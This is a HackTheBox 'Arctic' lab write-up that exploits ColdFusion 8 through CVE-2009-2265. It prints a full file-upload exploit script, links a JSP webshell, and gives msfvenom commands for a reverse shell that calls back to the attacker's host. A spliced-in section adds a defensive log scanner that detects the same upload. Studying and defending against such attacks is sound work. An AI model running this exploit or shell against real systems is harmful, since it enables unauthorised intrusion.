# HackTheBox - Arctic

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8Kr9EWOF1eV6NdciE%2Fimage.png?alt=media\&token=f56b9769-8696-4d70-92a9-a4cac3f2e463)

### Nmap scan results

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8KxOoTlrMbcLSiNRS%2Fimage.png?alt=media\&token=3433203b-cd03-4ed3-80da-5aaf617803be)

{% hint style="info" %}
From Wikipedia, the free encyclopedia. **Microsoft RPC** (**Microsoft** Remote Procedure Call) is a modified version of DCE/**RPC**. Additions include partial support for UCS-2 (but not Unicode) strings, implicit handles, and complex calculations in the variable-length string and structure paradigms already present in DCE/**RPC**.
{% endhint %}

> **Remote Procedure Call** (**RPC**) is a protocol that one program can use to request a service from a program located in another computer on a network without having to understand the network's details. **RPC** is **used to** call other processes on the remote systems like a local system.

### Identifying ColdFusion running on port 8500

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8MDM3LRNi0H5mZ1Me%2Fimage.png?alt=media\&token=e98a859f-4ea6-4110-a41d-d3ba4e4478f3)

The web server is running ColdFusion 8, so we can check for known vulnerabilities using **searchsploit**.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8MsZCH84HwL6Xvegl%2Fimage.png?alt=media\&token=697d52ea-12dc-4faa-973f-7c4af3f4c810)

### Exploiting ColdFusion's Arbitrary File Upload

We can try the `Arbitrary File Upload` module, as we are not interested in exploiting Cross-Site Scripting.

References: <https://onecompiler.com/python/3vurkz7hh>

```python
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html
# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import requests, sys

try:
    ip = sys.argv[1]
    port = sys.argv[2]
    if len(sys.argv) == 5:
        path = sys.argv[3]
        with open(sys.argv[4], 'r') as payload:
            body=payload.read()
    else:
        path = ""
        with open(sys.argv[3], 'r') as payload:
            body=payload.read()
except IndexError:
    print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.jsp>'
    print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'
    sys.exit(-1)

basepath = "http://" + ip + ":" + port + path

print 'Sending payload...'

try:
    req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/cmd.jsp%00",
files={'newfile': ('exploit2.txt', body, 'application/x-java-archive')}, timeout=90)
    if req.status_code == 200:
        print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/cmd.jsp'
    else:
        print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason
except requests.Timeout:
    print 'Failed to upload payload... Request timed out'

```

Let's upload a cmd.jsp file. You can get the `cmd.jsp` file from [here](https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/jsp/cmd.jsp).

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8SMMfZFEuR86HeWu2%2Fimage.png?alt=media\&token=6df36447-e238-4500-9d8f-0aa248121bd6)

The web server takes a long time to process a single request, so uploading the payload may take a while.

After the webshell gets uploaded, we can try a simple command to test it out.

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8SgYmQ61yPhiSvHod%2Fimage.png?alt=media\&token=e125c915-3cb5-404b-9574-4a347c064223)
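The defensive side of the same upload path, as an added example that is not part of the original writeup: it scans web-server log lines for the two artifacts this exploit leaves behind, a `FileUpload` request to the FCKeditor connector whose `CurrentFolder` carries a null byte or script extension, and a later request for a `.jsp` under `/userfiles/`. The log lines, addresses and timestamps are constructed, and the combined log format is an assumption.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in combined log format (not captured traffic).
SAMPLE_LOG = """\
10.10.14.5 - - [22/Mar/2021:10:01:12 +0000] "GET /CFIDE/administrator/ HTTP/1.1" 200 3012 "-" "Mozilla/5.0"
10.10.14.5 - - [22/Mar/2021:10:02:40 +0000] "POST /CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/cmd.jsp%00 HTTP/1.1" 200 412 "-" "python-requests/2.25.1"
10.10.14.5 - - [22/Mar/2021:10:03:05 +0000] "GET /userfiles/file/cmd.jsp?cmd=whoami HTTP/1.1" 200 88 "-" "curl/7.74.0"
192.168.1.20 - - [22/Mar/2021:10:04:00 +0000] "GET /userfiles/file/report.pdf HTTP/1.1" 200 91288 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+)[^"]*" (?P<status>\d{3})'
)
# FCKeditor connector shipped under the ColdFusion admin scripts tree.
CONNECTOR = "/cfide/scripts/ajax/fckeditor/editor/filemanager/connectors/"
# Files the upload directory should never serve as server-side code.
EXEC_EXT = (".jsp", ".cfm", ".cfml", ".cfc")


def classify(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    path = url.path.lower()
    qs = parse_qs(url.query)  # percent-decodes, so %00 becomes "\x00"
    finding = {"src": m["src"], "ts": m["ts"],
               "status": int(m["status"]), "path": url.path}
    if path.startswith(CONNECTOR):
        folder = qs.get("CurrentFolder", [""])[0]
        if qs.get("Command", [""])[0] == "FileUpload" and (
            "\x00" in folder or folder.lower().rstrip("/").endswith(EXEC_EXT)
        ):
            return {**finding, "severity": "high",
                    "reason": "FileUpload with null byte or script extension in CurrentFolder"}
        return {**finding, "severity": "medium",
                "reason": "request to FCKeditor connector (should be disabled)"}
    if path.startswith("/userfiles/") and path.endswith(EXEC_EXT):
        return {**finding, "severity": "high",
                "reason": "server-side script requested from upload directory"}
    return None


def scan(log_text):
    """Run classify() over every line and keep the findings in log order."""
    return [f for f in map(classify, log_text.splitlines()) if f]
```

Running `scan(SAMPLE_LOG)` reports the upload request and the follow-up `cmd.jsp` hit from the same source and ignores the ordinary admin page and PDF requests.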

### Generating JSP Reverse Shell using MSFVenom

Now I will upload a reverse shell instead of running commands through the webshell, as it takes a hell of a lot of time.

```bash
# Generate a raw JSP reverse shell payload
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.5 LPORT=4444 -f raw > shell.jsp
# Upload it with the exploit script above; the script always stores the file as
# userfiles/file/cmd.jsp, whatever the local file is called
python exploit.py 10.10.10.11 8500 shell.jsp
# Request the uploaded file to trigger the connection back to the listener on port 4444
curl http://10.10.10.11:8500/userfiles/file/cmd.jsp
```

![](https://3213130171-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MXuSwPsb0qfDA0yM5rj%2F-MZ8KhKnspnzkZdmAOwI%2F-MZ8Upi90gDc7VuJsytw%2Fimage.png?alt=media\&token=09dab123-8fe4-47da-a407-c0e8f19026d0)
